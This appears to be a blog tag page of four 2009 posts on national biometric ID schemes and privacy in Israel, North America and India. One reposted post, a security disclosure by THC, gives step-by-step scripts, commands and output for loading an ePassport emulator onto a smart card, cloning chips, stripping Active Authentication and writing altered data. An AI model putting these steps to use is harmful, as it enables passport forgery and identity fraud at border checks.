Posts Tagged ‘ Traceless Biometric ’

Big Brother: National Biometrics in Israel

Dec 30th, 2009 | By Innovya follow-up | Category: News

The Knesset has passed Israel’s Biometric Database Law, expected to provide the statutory basis for introduction of ‘smart’ identification documents for all Israelis.

Interior Ministry officials will be authorized to collect the Biometric data – fingerprints and facial contours – of all residents for the purpose of issuing identity cards, passports or other official documents.

As with similar identity regimes in Australia and elsewhere (eg the latest generation of Australian passports), those documents will feature a microprocessor (ie a chip similar to those used in some credit cards and perimeter access cards) that will contain data based on the individual’s fingerprints (two fingers) and facial geometry, eg a unique hash generated from an image of the person’s face rather than the image itself. Biometric and other information on the databases will be matched with registration information on national databases. That would permit an official to determine, for example, that the photo on an identity document corresponds to the bearer’s face but that the individual is using another name and therefore is engaging in an identity offence.

As yet I haven’t sighted the legislation. From media reports it appears that the government has mollified some critics through a statutory commitment to establish two discrete databases: one including the card-bearer’s name and the other featuring data from the individual’s fingerprints and the face. The databases will be established and maintained in two separate ministries and “will be linked by a code”. There seem to be no official statements about sharing data with the private sector.

The ‘splitting’ of initial plans for a central database was an addition to the draft legislation in November, promoted as a safety measure -

so that anyone managing to penetrate one data bank would have only part of the information and it would be meaningless without the information from the other data bank.

The Chair of the Knesset Science & Technology Committee claimed -

The protection provided for this data bank is among the best in the world. It is protected at a level of 11 on a scale of one to 10

… which sounds impressive but is arguably meaningless. (What’s an ’11′ when the scale ends at ’10′? The Bill’s sponsor subsequently explained that “if the databases of the Mossad, the Shin Bet and the Prime Minister’s Office are currently protected at a level of 10, then this one will be protected at a level of 11″.)

Debate about development of the new regime featured the usual claims. A government spokesperson claimed that “there are 350,000 people living in Israel with fraudulent documents including tens of thousands with forged passports” and that forgery of the ‘smart’ documents will be impossible.

One former police executive offered an exceptionalist argument, commenting that -

in a normal state that does not face the enemies we face, there is no need for such a system. But here we are in an intolerable situation, facing internal and external enemies. The ease with which current Israeli documents can be forged is an enormous problem.

[Identity documents] are so easily faked. For us, this is an existential issue. There are thousands of people walking around with fake IDs or with no IDs whatsoever. Some are criminals, and others are hostile elements. You would not believe how many suspects we have found who changed their identities to hide previous convictions. Many identities have also been stolen.

He noted that the danger of official misuse of information is present with existing databases.

Critics expressed concern that information will be leaked or misused, eg “Criminals could steal fingerprint information and use it to incriminate innocent people”. Likud Minister Michael Eitan indicated that -

Not only will the system threaten the privacy of all Israelis, but even worse, it will create an atmosphere in which everyone will feel their privacy is being invaded….

Eitan was not however planning to vote against the law. (???!!!)

Implementation of the law involves a two year trial period, during which participation in the biometric database/s will be voluntary. Three months prior to the end of trial, the government will formally re-assess the regime’s effectiveness, with the Prime Minister and Interior minister reporting to a special ministerial committee and to a Knesset committee. If the trial is deemed successful, Interior Ministry officials will be mandated to collect the biometric information without consent. The legislation allows some wriggle room: the Interior Minister will be empowered to extend the trial by an additional two years after provision of the reports, with a requirement that a ‘final decision’ must be made within four years after initiation of the databases.

Posted by Bruce Arnold at 2:03 PM

Tags: , , , , , , , , , , , ,
Posted in News |


U.S. – Canada To Share Refugees’ Biometric Info

Nov 25th, 2009 | By Innovya follow-up | Category: Evidence

BEAT THE CHIP

BEATTHECHIP.ORG IS DEVOTED TO PRESERVING US CITIZENS FROM THE PROGRESS OF REAL ID LEGISLATIONS

WEDNESDAY, NOVEMBER 25, 2009

c/o CanWest News Washington
WASHINGTON — Seeking to enhance its efforts to crack down on fraudulent refugee claims, the Harper government on Tuesday announced it has struck a deal to share fingerprint information on asylum seekers with the United States.

Public Safety Minister Peter Van Loan made the announcement following a bilateral summit here with U.S. Homeland Security Secretary Janet Napolitano.

Under the protocol, the U.S. will join a biometric data-sharing initiative Canada had already launched last summer with the United Kingdom and Australia.

“Biometrics continue to be a powerful tool to prevent terrorists and criminals from crossing our shared border and preventing identity theft and asylum fraud,” Napolitano said at a news conference with Van Loan.

Canada’s privacy commissioner, Jennifer Stoddart, had expressed a series of concerns about the biometric data sharing when the plan was first announced in August. Stoddart’s office questioned Ottawa about the need to collect fingerprints and sought assurances the personal information gathered would not be used for secondary purposes.

“While we are still reviewing their response, on the surface of it, it appears they have addressed most of our concerns,” said Anne-Marie Hayden, a spokesperson for the privacy commissioner.

“They have advised us that under the protocol, biometric information will only be used for immigration and nationality issues. They have also told us that biometric matching information will only be one of many elements considered when assessing a file.”

The privacy commissioner’s office is still awaiting a response, however, on how Citizenship and Immigration Canada “plans to address our concerns about how refugees, a very vulnerable population, will be notified about the collection and use of their biometric information,” Hayden said.

Napolitano said the U.S. will dispatch its chief privacy officer to Ottawa in early December for discussions with Canadian officials. “As we share information, we are committed to protecting privacy and civil rights,” she said.

Immigration Minister Jason Kenney has argued biometric data sharing on refugee claimants dramatically increases the government’s ability to identify foreign nationals who try to hide their past when seeking to enter Canada.
His office says the agreement allows countries to check each other’s fingerprint databases but doesn’t give them unfettered access to the information.

“Previous trials show that biometric information sharing works,” Kenney said in a statement Tuesday. “The data sharing helps uncover details about refugee claimants such as identity, nationality, criminality, travel and immigration history, all of which can prove relevant to the claim.”

When Canada, the U.K. and Australia initially signed the agreement last summer, they sought to allay privacy concerns by agreeing no central database of fingerprints would be created.

The information-sharing pact is part of a broader government initiative to introduce biometrics into Canada’s immigration and refugee screening system — a plan that continues to raise red flags for privacy advocates.

“We have made them aware of our concerns with respect to what seems to be a general trend toward an increased collection of biometric information,” Hayden said.

Tags: , , , , , ,
Posted in Evidence |


How to create a backup of your own passport chip(s)

Nov 12th, 2009 | By Innovya follow-up | Category: Evidence

logo

THC/vonJeek proudly presents an ePassport emulator. This emulator applet
allows you to create a backup of your own passport chip(s).


The government plans to use ePassports at Immigration and Border
Control. The information is electronically read from the Passport
and displayed to a Border Control Officer or used by an automated
setup. THC has discovered weaknesses in the system to (by)pass the
security checks. The detection of fake passport chips does not
work. Test setups do not raise alerts when a modified chip
is used. This enables an attacker to create a Passport with an
altered Picture, Name, DoB, Nationality and other credentials.

The manipulated information is displayed without any alarms going off.
The exploitation of this loophole is trivial and can be verified using
thc-epassport.

Regardless how good the intention of the government might have been, the
facts are that tested implementations of the ePassports Inspection System
are not secure.

ePassports give us a false sense of security: We are made to believe
that they make usemore secure. I'm afraid that's not true: current
ePassport implementations don't add security at all.


Thanks to Elv1s for beta testing!

Just follow two easy steps:

(1) Upload the emulator code to a blank JCOP v4.1 72k smart card
Use your favorite tool to upload the CAP file. As an example GPShell is
used. The script used to upload the CAP file:

P:\GPShell-1.4.2>type epassport.script
mode_211
enable_trace
establish_context
// edit the following line to match your PCSC reader
card_connect -readerNumber 3
select -AID A000000003000000
open_sc -security 3 -mac_key 404142434445464748494A4B4C4D4E4F -enc_key 404142434445464748494A4B4C4D4E4F -kek_key 404142434445464748494A4B4C4D4E4F
delete -AID A00000024710
install -file epassport.cap -priv 2
card_disconnect
release_context

A sample output of an actual upload:

P:\GPShell-1.4.2>GPShell.exe epassport.script
mode_211
enable_trace
establish_context
card_connect -readerNumber 3
* reader name OMNIKEY CardMan 5x21-CL 0
select -AID a000000003000000
Command --> 00A4040008A000000003000000
Wrapped command --> 00A4040008A000000003000000
Response <-- 6F108408A000000003000000A5049F6501FF9000
..
..
..
Wrapped command --> 84E60C002506A0000002471007A000000247100107A00000024710010100
02C90000B918E8E43A25117700
Response <-- 9000
card_disconnect
release_context

The CAP file currently supports the following files:

 * EF.COM :    32 bytes (required file)
 * EF.SOD :  2560 bytes (required file)
 * EF.DG1 :    96 bytes (required file)
 * EF.DG2 : 24576 bytes (required file)
 * EF.DG11:    64 bytes (optional, e.g. USA)
 * EF.DG12:    96 bytes (optional, e.g. USA)
 * EF.DG13:    96 bytes (optional, e.g. Japan, France)
 * EF.DG15:   192 bytes (optional, e.g. The Netherlands)

If you need support for other / larger DGs, please let vonJeek know.

(2a) Clone the chip
Using a customized THC version of Adam Laurie's RFIDIOt tools, you're able
to read a chip's content and to write it to an emulator.

P:\RFIDIOt-vonjeek>mrp0wn.py CLONE M3V0NJ33K000000999999

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek <mailto:vonjeek@thc.org> =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Put a ePassport near the terminal and press enter to continue...
Reading document using KEY M3V0NJ33K000000999999, please be patient...
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.


Done, happy mrp0wning :) 

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

If your chip is protected using the optional Active Authentication mechanism,
the Active Authentication data group (DG15, tag 0x6F) is removed from EF.COM
as demonstrated by Jeroen van Beek at the 2008 USA BlackHat Briefings. Note
that mrp0wn.py's parameter 'STRIP_AA' must be set to the value 'True'. This
attack will work on all inspection system implementations that are using e.g.
ICAO's "worked examples", see this site for more info on that.

index

(2b) Write saved data
It's also possible to write chip data you've saved earlier using RFIDIOt's
mrpkey.py. As an example you can use vonJeek's ePassport data. Note that
this data is self-signed: vonJeek started his own country :-D

P:\tmp>unzip vonjeek-epassport_dump.zip
Archive:  vonjeek-epassport_dump.zip
 extracting: EF_COM.BIN
  inflating: EF_DG2.BIN
  inflating: EF_DG1.BIN
 extracting: EF_SOD.BIN 

P:\>cd \RFIDIOt-vonjeek 

P:\RFIDIOt-vonjeek>mrp0wn.py WRITE /tmp

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek ;lt;mailto:vonjeek@thc.org> =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Document type is PASSPORT.
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.
Done, happy mrp0wning ;) 

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

You can also alter data before writing it to an emulator chip. If you want
to do that: this document contains details about - amongst others - DG1 and
DG2 encoding. If you've updated the DGs you can sign them using Peter
Gutmann's CryptLib. 

A read-out of vonJeek's ePassport chip using the reference implementation
named Golden Reader Tool can be seen below.

vonJeek's passport

If you're interested in ePassport related PKI (how to verify whether chip
content is signed by a bonafide authority?) please check the following URLs:

* http://www2.icao.int/en/MRTD/Pages/icaoPKD.aspx
* http://www.icao.int/icao/en/atb/meetings/2008/TagMRTD18/TagMrtd18_ip04.pdf
* http://www.csca-si.gov.si/TR-PKI_mrtds_ICC_read-only_access_v1_1.pdf
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467106.ece
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467098.ece 

Yours sincerly,

vonjeek [at] thc dot org
The Hackers Choice

http://www.thc.org

Tags: , , , , , , , ,
Posted in Evidence |


India working on standard for biometrics

Sep 26th, 2009 | By Innovya follow-up | Category: News

By Swati Prasad, ZDNet Asia – Friday, September 25, 2009 04:59 PM

NEW DELHI–The need for standards and concerns over security and privacy were highlighted this week, as the Indian government prepares to roll out various e-government projects based on biometrics.

“The industry, government and academia need to collaborate to evolve standards for biometrics,” Nandita Jain Mahajan, IBM’s India South chief privacy and information security office, said during the India Preparatory Meeting: Biometrics and Data Protection, held here Thursday. The two-day event was organized by the Data Security Council of India, a self-regulatory organization led by Nasscom.
According Mahajan, the Indian government should adopt open standards to avoid heavy dependence on one technology vendor.
The country is in the process of deploying biometric cards for various e-government schemes, including the national unique identity card and e-passport projects.
“No government wants to be locked into any one technology,” S. K. Sinha, senior director of National Informatics Centre (NIC), said during a panel discussion, adding that India has put much emphasis on standardization for the technology.
“The Indian government is working on a national standard for biometrics [and] wants to have a technology standard that is open and provides a level-playing field so that many vendors can take part,” Sinha said. However, he noted that standards should be established such that they can widely adopted by the industry. “Standards should be implementable,” he said.

Are biometric cards privacy-compatible?
According to Shree Parthasarthy, a director at Deloitte said biometrics is “as old as forensics”, taking into account several factors such as the iris scan, finger prints, appearance, social behavior, skull measurement, voice, and so on. “It’s impossible to replicate or mimic all of these characteristics,” Parthasarthy noted.
And while biometric cards offer better security, he noted that there are several primary concerns over the use of such cards, including questions about privacy protection, misuse of biometric data and how biometrics will support privacy policies.
According to Mahajan, there are three technology components in biometrics: acquisition, extraction and matcher. Often, all attributes of biometric cards do not match and the acceptability error rates can be high, he said.
“If your password is compromised, you can change it, but if your biometrics is compromised, what can you do about it,” he questioned.
Y. D. Wadaskar, managing director of Pune-based IT security products company, WYSE Biometrics Systems, said: “Every individual is unique and therefore, biometrics and privacy go hand in hand. We need to trust these cards just as we trust our doctors and lawyers when we share personal information with them.”
Sunil Dhaka, chief information security officer of ICICI Bank, said the bank has been successful in implementing biometric cards for agriculture-based banking in rural areas.
“Since rural India has no Internet or tele-banking facility, we realized the solution had to be online-offline ready,” Dhaka said. “With such cards, we can do banking at the speed of thought.”

One billion ID cards challenge
Zia Saquib, executive director of Centre for Development of Advanced Computing (C-DAC), who also attended the meet, noted that deploying biometric cards for citizens in New York is different from implementing similar schemes in rural India. C-DAC develops applications for e-government projects.
According to Saquib, data collection and enrolment in rural areas can prove a challenge as “identification is a sensitive issue,” he said.
“We need to have strong authentication processes in place at the time of enrolment, he explained, adding that biometric data must not be stored in the same place as personal data.”
Biometric data must be stored locally,” he said. Saquib also highlighted the benefits of using digital rights management methodology for biometrics, giving users access to information only on a “need to know” basis.
Sinha said generating over 1 billion national unique ID cards cannot be done with small number of stakeholders. “You need different stakeholders for enrolment, creation of database, generating algorithms, verifying and distributing these cards,” he added.
“And when you have so many stakeholders, the need for standards becomes all the more critical,” he noted. Asked how the government plans to address privacy and security concerns over biometric cards, he said it is still too early to provide comments.
Sinha said: “All we can say is that the data will be highly protected and we will put several cyber-controls and encryptions in place, in both online and offline mode.”
Swati Prasad is a freelance IT writer based in India.

Tags: , , , , , , ,
Posted in News |